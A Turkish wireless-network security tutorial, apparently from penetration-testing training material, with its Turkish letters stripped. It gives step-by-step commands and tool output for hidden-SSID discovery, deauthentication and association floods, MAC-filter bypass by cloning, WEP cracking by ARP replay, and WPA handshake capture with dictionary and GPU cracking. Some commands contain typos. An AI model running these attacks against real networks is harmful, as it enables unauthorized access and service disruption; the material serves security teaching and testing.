MAC tabanl eriim kontrol Piyasada yaygn kullanlan erisim noktas(AP) cihazlarnda gvenlik amal konulmu bir zellik de MAC adresine gre aa dahil olmadr. Burada yaplan kablosuz aa dahil olmasn istediimiz cihazlarn MAC adreslerinin belirlenerek erisim noktasna bildirilmesidir. Bylece tanmlanmam MAC adresine sahip cihazlar kablosuz amza balanamayacaktr. Yine kablosuz alarn doal alma yapsnda verilerin havada uutuunu gz nne alrsak aa bal cihazlarn MAC adresleri -a ifreli dahi olsa- havadan geecektir, "burnu kuvvetli koku alan" bir hacker bu paketleri yakalayarak izin verilmi MAC adreslerini alabilir ve kendi MAC adresini koklad MAC adresi ile deitirebilir.



Linux/OS X altnda MAC Adresinin Deitirilmesi Linux/OS X altnda MAC adresi deitirmek bize bir komut kadar uzaktadr.

# ifconfig eth1 hw ether 00:10:09:AA.54:09:56

Ya da mac-changer ile MAC adresi deiimi yaplabilir. macchanger kullanarak MAC adresi deitirme admlar

#ifconfig eth0 down #macchanger -m 00:11:22:33:44:55 eth0 #ifconfig eth0 up

Windows altnda MAC Adresinin Deitirilmesi Windows altnda MAC adresini deitirmek iin Computer -> Manage -> Device Manager zerinde network adaptr bulunur ve Properties -> Advanced sekmesinden Network Address deeri deitirilir.

ifreleme Metodu Kablosuz alarda trafiin bakalar tarafndan izlenmemesi iin alnmas gereken temel nlemlerden biri de trafii ifrelemektir. Kablosuz alarda ifreleme WEP(wired equivalent privacy) ve WPA(Wi-Fi Protected Access) olarak adlandrlan iki protokol zerinden yaplr. Her iki protokol de ek gvenlik nlemleri alnmazsa gnmzde gvenilir kabul edilmez. Internette yaplacak ksa bir arama ile Linux altnda uygun bir kablosuz a adaptr kullanlarak tek komutla WEP korumal alara nasl szld izlenebilir.



Bugne kadar WEP kullananlara hep WPAya gemeleri ve uzun karmak parola semeleri nerilirdi. Zira WPA, WEPin zayf kald noktalar glendirmek iin yazlm bir protokold. Fakat 2008in son aylarnda iki niversite rencisinin yapt alma, pratikte WPAnn ~15 dakika da krlabileceini ispat etmi oldu. Aslnda alma WPAda deil WPAnn kulland TKIP(emporal Key Integrity Protocol) bileenindeki aklktan kaynaklanyordu. Dolays ile WPA ve AES ifreleme kullanarak gerek manada gvenlik elde etmek u an iin mmkndr denebilir. Sonu olarak ;

Eriim noktalarnn ntanml ayarlar mutlaka deitirilmelidir. ifreleme olmadan gvenlik olmaz. AP ile istemci arasndaki MAC adresleri her durumda ak bir ekilde gider. MAC filtrelemeye gvenlilmemelidir: MAC adreslerini deitirmek olduka kolaydr. WEP/WPA ile korunmu alar ek gvenlik nlemleri alnmazsa gvenli deildir.

Katmanl gvenlik anlay gereince yukarda anlatlan yntemlerin uygulanmas gvenliinizi bir adm daha arttracaktr.



Kablosuz A Gvenlik Testleri Kablosuz alar yaznn banda da bahsedildii gibi internet kullanm evlere girdiinden beri ykselen bir kullanma sahip oldu. Gnmzde evlerde, iyerlerinde, kurumlarda ve sokaklarda kablosuz alar internete ulamann vazgeilmez ve kolay bir yolu oldu. Bu kolaylk beraberinde bir ok gvenlik riskini de beraberinde getirdi. Riskler, kablosuz alarda kullanlan protokollerden, zelliklerden ve kullanclarn bilinsizliinden kaynaklanmaktadr. zellikle kablosuz alara yaplabilecek bir ok saldr kk baz numaralarla anonim olarak gerekletirilebilir. Bu durum saldrganlarn cesaretini ve risk seviyesini artrc bir etki yapar.

Kablosuz Alarda Keif almalar Kablosuz alarda keif yakn evrede bulunan eriim noktalarnn tespitidir. i abartp WLAN aralarn arabalarna alarak ya da yaya olarak yol boyunca etrafta bulunan kablosuz alar kefetmeye ynelik almalara Wardriving, eriim noktalarnn zelliklerine gre (ifreleme destei var m? Hangi kanalda alyor vs) bulunduklar yerlere eitli iaretlerin izilmesine ise WarChalking deniyor. War driving iin eitli programlar kullanlabilir fakat bunlardan en nemlileri ve i yapar durumda olanlar Windows sistemler iin Netstumbler, Linux sistemler iin Kismetdir. Kismet ayn zamanda Windows iletim sisteminde monitor mode destekleyen kablosuz a arabirimleri ile de alabilmektedir. Kablosuz alarda keif, pasif ve aktif olmak zere ikiye ayrlr. Adndan da anlalaca gibi aktif keiflerde keif yapan kendisini belirtir ve aktif cihazlar aradn anons eder. Pasif keif trnde ise tam tersi bir durum sz konusudur. Pasif keif gerekletiren cihaz kesinlikle ortama herhangi birey anons etmez, sadece ortamdaki anonslar dinleyerek aktif ama gizli cihazlar belirlemeye alr. Aktif keif aralarna en iyi rnek NetStumbler verilebilir. cretsiz olarak kullanlabilen Netstumbler altrldnda kapsama alannda anons yapan tm aktif cihazlar bularak bunlar raporlar. Netstumblerin almas ya da bir erisim noktasn kefetmesi iin erisim noktasnn kendisini anons etmesi lazmdr. Yani basit gvenlik nlemi olarak aldmz SSID saklama ilemi Netstumbleri artacaktr. Pasif keif arac olarak kullanlabilen Kismet ise Netstumblera gre olduka fazla zellik ierir ve kt niyetli birinin elinde tam donanml gizli bir silaha dnebilir. Kismet, kablosuz a adaptrlerine zel bir modda altrarak(monitor mode) etrafta olan biteni izler ve kaydeder. Bylece bulunduu ortamdaki tm trafii grerek aktif, pasif eriim noktas cihazlarn tm zellikleri ile birlikte belirler. Sadece eriim noktas cihazlarn belirlemekle kalmaz, bu cihazlara bal tm istemci cihazlar ve zeliklerini de belirleyebilir daha da tesinde ifreleme kullanlmyorsa tm trafii dinler. Keif ilemi ile ilgili neler elde edilebilir?

Kablosuz a ifreli ise ifreleme protokol(WEP/WPA/WPA2) Aa bal istemcilerin MAC adresleri

Kablosuz a ifresiz, ak bir yayn yapyorsa aadaki tm balklar fiziksel olarak o ortamdaki bir istemci tarafndan a arabirimini monitor moda alarak elde edilebilr.

Mac adresleri IP adresleri



Bilgisayar isim ve markalar Ortamdaki TCP/UDP tm trafik

Grnmez(Gizli SSIDye sahip) Kablosuz Alarn Kefi Eer SSID gizlendiyse Wireshark Beacon framelerde SSID= gibi grrz . Baz kablosuz a tarama aralar ise SSID yerine gibi ifadeler yazar. Bu SSIDnin 8 karakterden olutuunu gsterir. Gizli SSIDyi tespit etmek iin nce ayn kanala geilir.

iwconfig mon0 channel 11

ki metot vardr: Pasif ve aktif.

Pasif olarak grenmek iin bir istemcinin APye balanmasn bekleyebiliriz. stemci balandnda iinde SSID yazl Probe Request gnderir. AP de cevap olarak SSIDnin yazl olduu Probe Response gnderir.

Aktif olarak aireplay-ng ile Deauthentication paketleri yollayp clientlarn balants drlmeye allr.

I.Metot Aktif metot:

aireplay-ng -0 5 -a 18:28:61:3b:3b:1c mon0

-a APnin MAC adresidir. -0 Deauthentication paketi saysdr. Say olarak 0 yazlrsa srekli gnderilir. Deauth. paketleri grmek iin WSda wlan.fc.type_subtype==0x0c filtresi uygulanr. Ekran grntsnde belirtilen ksm bir Probe Request framedir. SSIDnin BGA_Wifi olduu grlr. ncesindeki Deauthentication ve sonrasnda gelen Probe Response frameleri grlebilir.



(wlan.bssid == 18:28:61:3b:3b:1c) && !(wlan.fc.type_subtype == 0x08) Bu filtre ile Deauthentication, Probe Request ve Probe response frameleri grlr. II.Metot Ayn ilem airmon-ng ve Kismet aralar kullanarak pasif modda da yaplabilir. airmon-ng ile monitor moda geip Kismet ile ortamdaki paketleri dinlemeye balaynca, Kismet gizli SSIDye sahip APlerin MAC adreslerini Probe Request ve Probe Responselarla ilikilendirir ve otomatik olarak gizli SSIDyi tespit edebilir.

airmon-ng start wlan1

kismet

Balangta gizli SSID u ekilde listelenmi.



ift tklayarak detayl grntlenir ve beklemeye balanr.

Yeni bir istemci gizli SSIDye sahip APye balandnda Kismet otomatik olarak SSIDyi tespit eder.



Kablosuz Alarda Trafik Dinleme ve Analizi Kablosuz alarda veriler havada uutuu iin dinleme yapmak kablolu alara gre daha kolaydr. Amaca uygun kullanlan bir dinleme arac ile bir kablosuz adaki trafik aa dahil olmadan rahatlkla izlenebilir. Linux sistemlerde kablosuz a trafii dinlemek iin Kismet adl program tercih edilir. Kismet, monitoring (rfmon) mod destekleyen kablosuz a arabirimleri iin dnlm 802.11b, 802.11a ve 802.11g protokolleri ile uyumlu kablosuz alarda pasif dinleme yapmaya yarayan bir aratr. Ayn zamanda kablosuz alar iin pasif keif arac olarak ve basit manada saldr tespit sistemi olarak da kullanlabilir. Kismet ile dinleme yaplrken etraftaki eriim noktalar ya da istemciler rahatsz edilmez. Tamamen pasif modda bir dinleme yapld iin kablosuz alar korumaya ynelik baz saldr tespit sistemleri kolaylkla aldatlabilir. zellikle ifresiz bir iletiim yntemi tercih edilmise Kismet bu noktada kablosuz adaki tm hereyi grebilir. Kismet ve ek bir iki ara kullanlarak MAC adres tabanl gvenlik nlemi alnm kablosuz alara kolaylkla giri yaplabilir.

Ksmet Wireless Sniffer Kullanm Kismet ak kaynak kodlu kablosuz a analiz programdr. 802.11 a/b/g protokollerini destekler ve Linux, UNIX ve Windows ortamlarnda alr. Kismetin alabilmesi iin kablosuz a kartnzn monitor mode destei olmaldr. Monitor mode: Kablosuz alarda zel bir moddur ve ilgili arabirimin aa dahil olmadan tm paketleri izleyebilmesini salar. Kismetin en nemli zelliklerinden biri pasif olarak kablosuz a kefi yapabilmesi ve keif esnasnda iz brakmamasdr. Netstumbler gibi aralar keif esnasnda etrafa paket yaydklar iin iz brakrlar. Kismet istemci-sunucu mimarisinde alr ve kismet_server ve kismet_client adl iki farkl programdan oluur. Kismet_server asl ii yapan yani trafii izleyip kaydeden, kismet_client ise kismet_server tarafndan yaplan ilemlerin kullanc tarafndan izlenmesine olanak veren arabirimdir.



Kablosuz Alara Ynelik Saldr eitleri

Kablosuz Alara Ynelik DoS Saldrlar WEP'ten sonra WPA ve WPA2 ile kablosuz alarda CCMP kullanlarak gvenlik standart ykseltilsede, bu koruma sadece data framelere uygulanabiliyordu. Management frameler ile ilgili bir ilem ise yoktu. Yani management frameler ifresiz ve manipule edilebilir durumdadr. Man. framlerin bu zellii! kablosuz alar Dos ataklara ak brakmaktadr. Gerek hayatta karlalan bir ok Dos atak eidi(HTTP Flood, TCP SYN flood, ICMP flood) kablosuz alarda da uygulanabilir. Ancak kablosuz alara zel olan DOS saldrlarda vardr. Bu saldrlar OSI modelinde, iletiimin frame(ereve)ler ile saland 2.katmannda(Data link layer) uygulanr. (Fiziksel katmanda jammerlar ile sinyaller bozularakta iletiim engellenebilir.) Yaplan saldrlar authentication/association flood ve deauthentication/disassociation flood eklindedir. Bir istemci AP ile balant kurma aamas kabaca u ekilde gerekleir:

1. stemci Authentication isteinde bulunur. 2. AP authentication cevab yollar. 3. stemci assocation isteinde bulunur. 4. AP assocation cevab yollar.

Association ilemi iin authentication arttr. Bir istemci birden fazla sisteme authentication kurmu olabilir ancak sadece bir AP ile association kurabilir. Saldry belli bir kullancya(bilgisayara) ynlendirmek iin bu ilemlerden nce airodump-ng, Ksmet gibi aralarla hedef kablosuz aa bal kullanclara keif almas yaplabilir. (Bu saldrlar iletiimi bir sre kesintiye uratabilir, APyi yeniden balatmak gerekebilir. ) Authentication atak iin;

mdk3 mon0 a -m -i F8:D1:11:40:D2:8E

Deauthentication frame, istemci veya AP tarafndan balanty sonlandrmak amacyla gnderilir. Deauthentication atak yapmas ok kolaydr. Bunun iin mdk3 kullanlmtr. Broadcast MAC adrese gnderilecek sahte frameler ile kablosuz aa bal tm istemciler adan drlebilir. -b ile deauthentication saldrs yaplacak MAC adreslerinin olduu dosya okutulur.

mdk3 mon0 d -b mac_adresi_listesi -c 4 aireplay-ng --deauth 20 -a 00:1F:D4:01:6A:C8 -c 00:27:10:5C:08:18 mon0

Association flood: AP association salanm her istemci iin bir tablo tutar. Bu tarz atakta snrl bellee sahip tablonun doldurulmas ve yeni istemcilerin balananamas amalanr. Bunun iin srekli deien MAC adresleri ile AP'ye association istekleri gnderilir.



IEEE 802.11w ile management frameler ifreli olarak gnderilebilmektedir. Ancak bu standart henz yaygnlamamtr.

Mac Adres Filtreleme nlemlerinin Atlatlmas Kablosuz a iin uygulanabilecek gvenlik nlemlerinden biriside MAC adresi filtrelemesidir. Bir ok switch/modem tarafndan desteklenen bu zellikle sadece istenen MAC adreslerinin kablosuz aa balanmas salanabilir. Ancak bu koruma aa bal kullanclar tespit edilerek atlatlabilir. 1. adm aa balanma yetkisi olan istemcilerin tespiti 2. adm aa balanma yetkisi olan mac adreslerinin klonlanmas 3. adm eriim izni olan mac adresi ile birlikte aa balanma denemesi Aadaki gibi hedef kablosuz aa bal kullanc bilgileri sniff edilmeye balanmtr.

airodump-ng mon0 --bssid 18:28:61:3B:3B:1E -c 3

Aa bal gzken 4 kullancdan sadece ortada bulunan 2 tanesinin MAC adresleri modem zerinde tanmlanmtr. Hedef olarak 00:23:08:E9:B4:DF MAC adresli kullanc alnmtr.

CH 3 ][ Elapsed: 1 min ][ 2014-05-15 19:40 ][ fixed channel mon0: -1 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 18:28:61:3B:3B:1E -35 100 366 355 0 3 54e WPA2 CCMP PSK Korsan BSSID STATION PWR Rate Lost Frames Probe 18:28:61:3B:3B:1E A0:F3:C1:27:BF:E8 0 0 - 1 0 1 18:28:61:3B:3B:1E 20:C9:D0:BF:7D:F1 -31 54e-54 0 226 18:28:61:3B:3B:1E 00:23:08:E9:B4:DF -46 54e-54e 0 129 18:28:61:3B:3B:1E 28:BA:B5:39:C0:1D -49 0 - 1 0 4

Bu aa balanlmak istendiinde aadaki gibi Access Point: Not-Associated olarak gzkmektedir.

root@kali:~# iwconfig wlan1 wlan1 IEEE 802.11bgn ESSID:"Korsan" Mode:Managed Frequency:2.422 GHz Access Point: Not-Associated Tx-Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off

Atlatmak iin MAC adresimizi hedef olarak belirlenen MAC adresi ile deitiririz. Bunun yapabilmek iin kablosuz aa bal arayz down hale getirilir. MAC adresi deitirildikten sonra tekrar up yaplr.



root@kali:~# ifconfig wlan1 down root@kali:~# macchanger -m 00:23:08:E9:B4:DF wlan1 Permanent MAC: a0:f3:c1:27:bf:e8 (unknown) Current MAC: a0:f3:c1:27:bf:e8 (unknown) New MAC: 00:23:08:e9:b4:df (Arcadyan Technology Corporation) root@kali:~# ifconfig wlan1 up

Kablosuz aa tekrar balanlmaya alldnda sonu aadaki gibi baarldr.

wlan1 IEEE 802.11bgn ESSID:"Korsan" Mode:Managed Frequency:2.422 GHz Access Point: 18:28:61:3B:3B:1E Bit Rate=54 Mb/s Tx-Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=70/70 Signal level=-36 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:232 Missed beacon:0

Bazen ada ayn MAC adresi olduu iin IP alma konusunda skntlar yaanabilir. Bunun iin MAC adresini deitirmeden nce hedef istemciye zel deauthentication saldrs yaplp adan drlebilir.

root@kali:~# aireplay-ng --deauth 50 -a 18:28:61:3B:3B:1E -c 00:23:08:e9:b4:df mon0

50, gnderilecek deauthentication paketlerinin saysn -a, APnin MAC adresini -c, hedef istemcinin MAC adresini ifade eder. mon0 ise atan yapld kablosuz a arayzdr.



Kablosuz Ada ifreleme Protokolleri ve Krma almalar Kablosuz alarda bilginin gizlilii ve gvenlii amal kullanlan 3 eit ifreleme protokol vardr. WEP iin WEP, WPA iin TKIP ve WPA-2 iin CCMP ifreleme protokolleri data frameleri ifrelemek iin kullanlr. WEP korumas gnmzde rahatlkla alabilir bir gvenlik nlemi haline gelmitir. WEP/WPA/WPA2 karlatrma tablosu

Kimlik Dorulama ifreleme

WEP Open/Shared Key WEP

WPA(Kiisel) PSK TKIP

WPA2(Kiisel) PSK AES- CCMP

WPA(Kurumsal) 802.1x TKIP

WPA2(Kurumsal) 802.1x AES-CCMP

WEP Protokol Parola Krma almalar WEP parolalarnn krma ilemi, hedef APye bal istemci sistemin olup olmamas, hangi paketlerin topland ve krlma algoritmasna gre deiiklik gstermektedir. Bu alma aircrack aralaryla Kali zerinde yaplmtr. Aircrack WEP parolas krmak iin varsaylan olarak PTW metodunu kullanmaktadr. PTW metodunda parola krma ilemi toplanan ARP istek ve cevaplarna gre yaplr. nk ARP paketi bilinen bir boyuta ve gnderilen MAC adresine(ff:ff:ff:ff:ff:ff:) sahiptir. lk olarak kablosuz a adaptrmzn bal olduu arayz monitor moda geirilmelidir. Burada hedef AP 1. kanalda alt iin, wlan1 arayznden sonra kanal numaras belirtilmitir.

airmon-ng start wlan1 1

lem baarlysa cevap:

Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 7301 dhclient Interface Chipset Driver wlan1 Atheros AR9271 ath9k - [phy0] (monitor mode enabled on mon0)



Bu ilemlerin yaplabilmesi iin kablosuz a adaptrnn injection desteklemesi gerekmektedir. Bundan emin olmak iin aadaki komut altrlabilir.

aireplay-ng -9 -e BGA_Wifi -a F8-1A-67-50-70-3C mon0

Destekliyorsa aadaki gibi gzkecektir.

16:02:28 Waiting for beacon frame (BSSID: F8:1A:67:50:70:3C) on channel -1 16:02:28 Trying broadcast probe requests... 16:02:28 Injection is working! 16:02:30 Found 1 AP 16:02:30 Trying directed probe requests... 16:02:30 F8:1A:67:50:70:3C - channel: 1 - 'BGA_Wifi' 16:02:31 Ping (min/avg/max): 1.028ms/19.059ms/52.397ms Power: -34.37 16:02:31 30/30: 100%

kinci olarak hedef APye ait trafii kaydetmek(yani IVleri) amacyla airodump-ng arac kullanlr.

airodump-ng -c 1 --bssid F8-1A-67-50-70-3C -w WEP_dump mon0

Yukardaki komutta -c ile hedef APnin alt kanal, -bssid ile hedef APnin MAC adresi, -w ile trafiin kaydedilecei dosya ismi belirtilir. Eer WEPte Open Authentication kullanlyorsa tm istemciler APye balanabilir(authentication and association). Ancak AP doru WEP anahtaryla ifrelenmemi hi bir paketi kabul etmeyecektir, drecektir. Bu nedenle hedef APye paket enjeksiyonu yapabilmek iin ncelikle MAC adresimizin authentication ve association aamalarn gemesi gerekir. Bunu yaptmzda AP paketlerimizi kabul eder ve biz her paket gnderdiimizde yeni IVler retilir. Baka bir terminalde aadaki komut altrlr.

aireplay-ng -1 0 -e BGA_Wifi -a F8-1A-67-50-70-3C -h A0-F3-C1-27-BF-E8 mon0 --ignore-negative-one

Baarl ilem iin cevap aadaki gibidir.

15:12:27 Waiting for beacon frame (BSSID: F8:1A:67:50:70:3C) on channel -1 15:12:27 Sending Authentication Request (Open System) [ACK] 15:12:27 Authentication successful 15:12:27 Sending Association Request [ACK] 15:12:27 Association successful :-) (AID: 1)

Bu aamada ise toplanan IV saysn hzl bir ekilde artrmak iin aireplay-ng arac altrlr. Monitor modda dinlemeye geildiinde WEP ile ifrelenen paketlerden bazlarnn(ARP) standart bir uzunlua ve belli bir



hedef MAC adresine(Broadcast=FF:FF:FF:FF:FF:FF) sahip olduu grlr. Bu durumda ARP isteklerini ifreli olsa dahi tanmak ve yakalamak ok kolaydr. Aireplay ARP isteklerini dinler ve aynsn retip tekrar enjeksiyon yapar. Hedef sistemde farkl bir IVyle buna cevap verir. Bu ilem yaplarak ksa bir srede farkl IVler kullanan paketler toplanm olur.

aireplay-ng -3 -b F8-1A-67-50-70-3C -h A0-F3-C1-27-BF-E8 mon0 -e BGA_Wifi --ignore-negative-one

-b ile hedef APnin MAC adresi -h ile bizim MAC adresimiz -e ile hedef SSID Cevap:

15:15:14 Waiting for beacon frame (BSSID: F8:1A:67:50:70:3C) on channel -1 Saving ARP requests in replay_arp-0704-151514.cap You should also start airodump-ng to capture replies. Read 982 packets (got 108 ARP requests and 115 ACKs), sent 140 packets...(501 pp Read 1132 packets (got 153 ARP requests and 149 ACKs), sent 189 packets...(498 p Read 1287 packets (got 204 ARP requests and 186 ACKs), sent 239 packets...(498 p Read 1433 packets (got 273 ARP requests and 230 ACKs), sent 290 packets...(500 p ..

Yeterince paket(40000 civar) toplayana kadar bu ileme devam edilir. Daha nce alan airodump oturumu kontrol edilirse toplanan paket saysnn hzla artaca grlr. Airodump-ng zerinde en az 40000 paket toplandnda Ctrl + C ile ilem kesilebilir. Son olarak aircrack-ng ile airodump-ngnin WEP_dump olarak kaydettii cap dosyas okutulur.

aircrack-ng -b F8:1A:67:50:70:3C WEP_dump-01.cap

-b ile hedef APnin MAC adresi girilir. Parola bulunmutur.

Opening WEP_dump-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 40514 ivs. KEY FOUND! [ 12:34:56:78:90 ] Decrypted correctly: 100%

Ayn ilem -K opsiyonuyla FMS/KoreK metodu kullanlarakta krlabilir. Ancak bu metot daha fazla sre ve paket gerektirir.



WPA/WPA2 Parola Krma almas WPA/WPA2 parola krma almalarnda en nemli husus, henz WPA/WPA2 iin bilinen bir zafiyet olmaddr. Kullanlan aralar, kaba kuvvet veya szlk saldrlaryla verdiimiz kelimeleri srayla pasif olarak denemektedir. Bu durum elimizdeki kelime listesinin nemini ortaya koymaktadr. Sk kullanlan basit parolalarn yannda, hedefe uygun parola listesi de kullanlmaldr. Szlk saldrlaryla, sadece hedefin parolas elimizdeki kelime listesinde var ise parola ele geirilebilir. Kaba kuvvet saldrlarnda ise rastgele retilen(kurallar belirlenebilir) parolalar srayla denenmektedir. Kaba kuvvet saldrlar ou zaman GPU destekli sistemler ve parola krma yazlmlaryla anlam kazanmaktadr. CPU ile bir WPA/WPA2 parolasn krmak yllar alabilir. 1. ncelikle kablosuz a kartn monitr moda almalyz.

airmon-ng start wlan1 11

2. evrede 11.kanalda yayn yapan ve WPA ile korunan kablosuz alar grmek iin(BGA_Wifin bulunduu kanal 11dir.);

airodump-ng --channel 11 --encrypt wpa wlan1

Burada WPA parolasn kracamz kablosuz aa ait BSSID'yi alyoruz. Bu ekran kapatlmadan baka ekranlarda aadaki komutlar altrlr. WPA handshake yakalandnda bu ekranda grnecektir. 3. Yukarda aldmz BSSID deerini --bssid deeri ile aadaki komutumuza veriyoruz. Bylece bu BSSIDye sahip kablosuzu dinlemeye alyoruz ve paketleri lol dosyasna yazyoruz.(fixed channel mon0: -1 uyars verdii durumlarda --ignore-negative-one ie yarayabilir. Eer airodump ile dinlemeye geildiinde bu uyar varsa handshake yakalansa dahi bununla ilgili bir uyar vermeyebilir.)

airodump-ng --channel 11 --encrypt wpa --bssid F8:1A:67:50:70:3C -w lol mon0 --ignore-negative-one

airodump WPA handshakei yakaladnda sa st tarafta bununla ilgili bir uyar kacaktr.

CH 11 ][ Elapsed: 16 s ][ 2014-07-06 20:32 ][ WPA handshake: F8:1A:67:50:70:3C BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID F8:1A:67:50:70:3C -18 100 165 68 10 11 54e. WPA CCMP PSK BGA_Wifi BSSID STATION PWR Rate Lost Frames Probe F8:1A:67:50:70:3C 20:C9:D0:BF:7D:F1 -30 1e- 1 78 29

Bu ilem Wireshark ile de yaplabilir. Bunun iin komut satrnda wireshark balatlr.



wireshark&

Ardndan sol tarafta yer alan arayzlerden mon0a ift tklanr ve kan pencerede Capture packets in monitor mode seilir. Son olarak yeil yzgee tklanarak sniffing ilemine balanr.

Wireshark btn paketleri izleyecektir. Ancak burada nemli olan 4l el skmay(4-Way Handshake) oluturan WPA paketlerini yakalamaktr. Bu nedenle filtre ksmna eapol yazlr ve bir istemcinin bir APye balanmas beklenir. Balant salandnda grnt aadaki gibi olacaktr.



Daha sonra krmz kare dmeye baslr ve sniffing durdurulur. Dosya pcap uzantl olarak kaydedilir.



4. imdi ise sra kablosuz aa bal kullanclar drmekte. Beklenip bir kullancnn balanmasda beklenebilir ama bir kullancy drmek ve otomatik balanmas ile WPA handshake elde etmek bize zaman kazandracaktr. Bunun iin;

aireplay-ng -0 5 -a F8:1A:67:50:70:3C -c 00:1E4C:43:A6:3E mon0

-0 deauthentication paketi hazrlar, 5 toplam paket saysn belirtir, -a access pointin MAC adresidir, -c istemcinin MAC adresidir, mon0 kullanlacak a arabirimidir. Bylece hedef APden geliyormu gibi istemciye 5 tane deauthentication paketi gnderilir. Ayn ilem tm istemciler durdurulana kadar deauthentication paketi gnderilerekte yaplabilir. -0 seeneinin yannda belirtilen 0 says ilem durdurulana kadar paket gndermeye devam eder.

aireplay-ng -0 0 -a F8:1A:67:50:70:3C mon0

5. airodump-ng ekranna gei yaplrsa WPA handshake yakalandnda burada "WPA Handshake: F8:1A:67:50:70:3C" gibi bir ifade yazar. Wiresharkta ise daha nce bahsedildii gibi filtre olarak eapol yazarak yakalanan handshake grntlenebilir. 6. En son elde edilen WPA handshake ile kayt edilen lol-01.cap dosyasnn aircrack-ng ile krlmas gerekir. Bunun iin;

airecrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -c lol-01.cap

-w wordlist/szlk/parola veritabannn yolunu belirtir -c .cap dosyasnn yolunu belirtir.

Hedefe Ynelik Szlk Oluturma Kullanlacak olan szlk ok nemlidir. Hem basit ve ntanml parolalar, hemde hedefe ynelik olas parolalarn szlk iinde kullanlmas almann baarsn dorudan etkileyecektir. Basit parolalar iin rockyou ve benzeri kelime listeleri kullanlabilir. Hedefe ynelik olas parola kombinasyonlarn karmak iin ise crunch arac kullanlabilir. rnein hedefte Kurum A.. olsun. Kurumsal firmalarda eer kimlik dorulama WPS-PSK ile salanyorsa genelde kurum ismi ardndan gelen 4-5 karakterlik bir say dizisi ve belki sonuna bir yada iki tane zel karakter eklinde olmaktadr. Bu bilgiler nda crunch ile bir liste oluturalm.

crunch 10 10 -t Kurum%%%%^ -o kurum1.txt

Yukardaki ifade de % sembolleri saylara ve ^ sembol zel karakterlere denk gelmektedir. Kurum ksm ise -t ile zel bir liste hazrladmz belirttiimiz iin sabit olarak kalacaktr. Sonuta crunch bize Kurum2378, Kurum8473!, Kurum0282= gibi kombinasyonlar retecektir.



Crunch ktsna gre bu szlk 3MB yer kaplayacaktr ve iinde 330000 kombinasyon barndrmaktadr.

Crunch will now generate the following amount of data: 3630000 bytes 3 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 330000

ifre krldnda ekranda gzkecektir.

root@kali:~# aircrack-ng -w kelime_listesi -c lol-01.cap Opening lol-01.cap Read 2417 packets. # BSSID ESSID Encryption 1 F8:1A:67:50:70:3C BGA_Wifi WPA (1 handshake) Choosing first network as target. Opening lol-01.cap Reading packets, please wait... Aircrack-ng 1.2 beta3 [00:00:00] 2 keys tested (883.20 k/s) KEY FOUND! [ Bga_Zor_Parola ] Master Key : 7F EE F8 B2 19 A2 17 58 0F B6 18 F5 F1 06 9A 00 EC 12 7A 11 25 B1 51 BD A6 CD AA FF B4 88 B8 1E Transient Key : 73 E7 72 6B 2E 41 74 75 D1 DB 19 37 57 5E 47 99 E5 E8 38 96 3B C9 5E 44 38 42 6C 60 BA F2 FA 0C 9F 50 0E 4E B9 72 4A 77 58 53 5E 05 9C D9 1A 76 69 8C 2E DE 91 77 5A D7 63 CE 17 F8 4D 26 36 B7 EAPOL HMAC : 7E E0 F4 48 80 72 DC FF C5 7B A1 0B 7D FD 59 E8

GPU Destekli Parola Krma almalar GPU ile krma iin AMD Radeon HD 7970 ekran kartna sahip Windows 8 iletim sistemi ve ara olarak oclHashcat64 kullanlmtr.



Parola krma ilemi hashcat zerinde yaplaca iin ncelikle .cap uzantl dosyann hashcat iin uygun ekilde dntrlmesi lazm.

aircrack-ng -J lol lol-01.cap

-J hashcat iin oluturulan dosyann addr. En son yazlan dosya ise airodump-ng ile daha nce elde edilen cap dosyasdr. Sonu olarak bulunulan dizinde lol.hccap diye bir dosya oluacaktr. Windows iin gerekli komut aadakine benzerdir. -n ve --gpu--loops seenekleri GPU modeline gre deiiklik gsterebilir. -m seenei WPA/WPA2 parolas krmak iin 2500 olarak ayarlanr. -a3 kaba kuvvet saldrsn ifade eder. -o parametresiyle kt dosyas belirtilir ve son olarak hccap uzantl dosyann yolu gsterilir.

oclHashcat64.exe -n 800 --gpu-loops 256 --status --force -m 2500 -a3 C:\Users\gpu\Desktop\lol.hccap -o lol.txt

Hashcat bu komut iin 1-2 yllk bir tahmini sre vermektedir. Bu nedenle hashcatin kaba kuvvet saldrlarn daha verimli klmak iin sunduu mask attack tipi kullanlabilir.

Session.Name...: oclHashcat Status.........: Aborted Input.Mode.....: Mask (?1?2?2?2?2?2?2?3) [8] Hash.Target....: BGA_Wifi (20:c9:d0:bf:7d:f1 f8:1a:67:50:70:3c) Hash.Type......: WPA/WPA2 Time.Started...: Mon Jul 07 07:15:57 2014 (1 min, 34 secs) Time.Estimated.: Tue Jan 05 15:26:50 2016 (1 year, 182 days) Speed.GPU.#1...: 119.7 kH/s Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress.......: 11059200/5533380698112 (0.00%) Skipped........: 0/11059200 (0.00%) Rejected.......: 0/11059200 (0.00%)

